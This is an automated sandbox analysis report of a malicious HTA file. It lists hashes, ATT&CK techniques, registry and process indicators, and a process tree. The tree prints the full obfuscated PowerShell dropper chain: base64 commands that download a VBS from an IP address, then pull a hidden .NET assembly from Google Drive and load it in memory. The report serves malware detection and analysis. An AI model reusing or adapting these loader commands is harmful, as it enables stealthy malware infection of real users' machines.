809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
29-10-2024 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Size

131KB
MD5

07a93908c3113536577c9c5b734a0af0
SHA1

794af14ec431e796ca6b61ed2094f623b86d77a9
SHA256

809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202
SHA512

34ef8170d518afbf42bc16a0759f3609153338e6e4bbc1ce05e94933e13ce4f6c1c8f5de7aedfe5f675311f593d5cbe377908815922d55a076eaa7c35493ba79
SSDEEP

96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

PoWerShELL.eXEpowershell.exe

flow pid process

4 2692 PoWerShELL.eXE
6 1036 powershell.exe
8 1036 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2028 powershell.exe
1036 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWerShELL.eXEpowershell.exe

pid process

2692 PoWerShELL.eXE
1836 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2692	PoWerShELL.eXE
6	1036	powershell.exe
8	1036	powershell.exe

pid	process
2028	powershell.exe
1036	powershell.exe

pid	process
2692	PoWerShELL.eXE
1836	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exePoWerShELL.eXEpowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWerShELL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

PoWerShELL.eXEpowershell.exepowershell.exepowershell.exe

pid process

2692 PoWerShELL.eXE
1836 powershell.exe
2692 PoWerShELL.eXE
2692 PoWerShELL.eXE
2028 powershell.exe
1036 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2692	PoWerShELL.eXE
1836	powershell.exe
2692	PoWerShELL.eXE
2692	PoWerShELL.eXE
2028	powershell.exe
1036	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoWerShELL.eXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2692	PoWerShELL.eXE
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePoWerShELL.eXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1724 wrote to memory of 2692	1724	mshta.exe	PoWerShELL.eXE
PID 1724 wrote to memory of 2692	1724	mshta.exe	PoWerShELL.eXE
PID 1724 wrote to memory of 2692	1724	mshta.exe	PoWerShELL.eXE
PID 1724 wrote to memory of 2692	1724	mshta.exe	PoWerShELL.eXE
PID 2692 wrote to memory of 1836	2692	PoWerShELL.eXE	powershell.exe
PID 2692 wrote to memory of 1836	2692	PoWerShELL.eXE	powershell.exe
PID 2692 wrote to memory of 1836	2692	PoWerShELL.eXE	powershell.exe
PID 2692 wrote to memory of 1836	2692	PoWerShELL.eXE	powershell.exe
PID 2692 wrote to memory of 2740	2692	PoWerShELL.eXE	csc.exe
PID 2692 wrote to memory of 2740	2692	PoWerShELL.eXE	csc.exe
PID 2692 wrote to memory of 2740	2692	PoWerShELL.eXE	csc.exe
PID 2692 wrote to memory of 2740	2692	PoWerShELL.eXE	csc.exe
PID 2740 wrote to memory of 2952	2740	csc.exe	cvtres.exe
PID 2740 wrote to memory of 2952	2740	csc.exe	cvtres.exe
PID 2740 wrote to memory of 2952	2740	csc.exe	cvtres.exe
PID 2740 wrote to memory of 2952	2740	csc.exe	cvtres.exe
PID 2692 wrote to memory of 3068	2692	PoWerShELL.eXE	WScript.exe
PID 2692 wrote to memory of 3068	2692	PoWerShELL.eXE	WScript.exe
PID 2692 wrote to memory of 3068	2692	PoWerShELL.eXE	WScript.exe
PID 2692 wrote to memory of 3068	2692	PoWerShELL.eXE	WScript.exe
PID 3068 wrote to memory of 2028	3068	WScript.exe	powershell.exe
PID 3068 wrote to memory of 2028	3068	WScript.exe	powershell.exe
PID 3068 wrote to memory of 2028	3068	WScript.exe	powershell.exe
PID 3068 wrote to memory of 2028	3068	WScript.exe	powershell.exe
PID 2028 wrote to memory of 1036	2028	powershell.exe	powershell.exe
PID 2028 wrote to memory of 1036	2028	powershell.exe	powershell.exe
PID 2028 wrote to memory of 1036	2028	powershell.exe	powershell.exe
PID 2028 wrote to memory of 1036	2028	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1724
- C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE
  "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp

Filesize
1KB

MD5
b0b72fcf0026cd6682e1e3563c62cebf

SHA1
90a198c0044bfbe28584c77a1268f05294d85527

SHA256
45dba0d7fa853be4c8a0eb1d061384bd0db0d9f57a81903a98cfd7dfface8c08

SHA512
6f7b62809d3443cdc47f4822146612db13637087befbaaa2342e1830fb1f2cef873153ac3bfbb5851de71c168eef7919885db93e4b138571830e9d10f0ee6b2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\x42fpnjy.dll

Filesize
3KB

MD5
dd6e4513b2e133abb449997925cefbd2

SHA1
703be0b5ab1675eafe7920423527d93b85b84bff

SHA256
31a03dc9e321e20b8590a0a92940ddd04b6569aa3a742afb3c5e88b71f6acd21

SHA512
b8171dd059bcf00c8eb204f3c301f116903ce80293b863b462e15e08f6ac367b6948f11fb151881fd8002e69238377a631203db4be5986c9fa2963a43d5d0f46

Download Submit
C:\Users\Admin\AppData\Local\Temp\x42fpnjy.pdb

Filesize
7KB

MD5
dc648b72c594cb1a03995ab0d95c3748

SHA1
eda241790485f054cf85a6871e6d3f697534a266

SHA256
44135793881d359e7569f7b229892c463820d37932c233093a980400229eae00

SHA512
44437f7c84e644a0b83193b7c47f5c1f2efddf9df1e4ed25078c3bdc6c67a4f8e2b0bbc898ba5385cf986c74ad9f04922669542f2cda7f4c3f687cc03badf69b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c45d6dce016a4f81260de0ca4534940c

SHA1
1b7bee188328c32d8f3e33181a8f4f06dc66a000

SHA256
405badae793d0bd4fb1ca82d0a9baf36c9d5d44556b2d6008e49344494e51ae0

SHA512
53956b5a8cb9a2245a58f39b0d667cb554e8fcf218490110f41278dae829813a592a78d148803f4c1c7003fb83fef4ac79d69f2505a2e61e52dfe9ac6d6c1a40

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS

Filesize
137KB

MD5
bf515f00df29b4be31ac6e43ab05cd88

SHA1
29073164d5fdfd336c332321ebd8c01920438a8b

SHA256
50b9f7f3880e858ac733e7a7fb6b679e699c8bc9553948d04b2c15194b7520dc

SHA512
6ebb327de4fd7dc7d348ec32c7d7cc9d79bd2753fae2e29f7910e27d52091c6765e6ec6c0e982156661e9b80fe223c831cc739956624ef66262adffa1174ada7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp

Filesize
652B

MD5
7beb367a026c3ae036ca9c854a52938e

SHA1
44e5d47186b69bdf72f8ef392ffdc397a4438579

SHA256
0513e5f905d6c373aa983adc4bb0a6a165eb0f31d360789ad8a79b4aa2623676

SHA512
7d36e9ff5cd792f811e595fe33148ec501e44863b3aebd570691af2c669c51f8a98827294b676b88f428f93bb4b4cdcab036943512260e0eaae8f045d5abc74f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x42fpnjy.0.cs

Filesize
462B

MD5
bf57b8e732d7b6222960bf1d5dd5df18

SHA1
0cda321126a9876c2881199b2940c05492b0d94f

SHA256
f77463e3272af620bc1620c10233f07a3e1c43b77d053a3477a92579b912ccfc

SHA512
9ed1f51736815946772533e380020b0de4c449aaa72db6b2ce29d7eab458216dd8fa9b9333a07164c72290d758412dcbab51099da031ed465ee62f73a14cfabb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline

Filesize
309B

MD5
7e22b540e64920d5ac0458fe3f502bd5

SHA1
d48c6e50273b4ce0a4a9eee16b39a8c8cdd6d7a6

SHA256
ab041e688887801b573c580b110f8912c4c61fd5f5732404f85fbcd30fc08a79

SHA512
123b2d45bf9155804ba7bb169500bf318f0600e750ba8926fe5d6edcd694b92fb1f6ca94b9d09f78d4baf909925739403aed23e05e5057ba05d1f21422358c55

Download Submit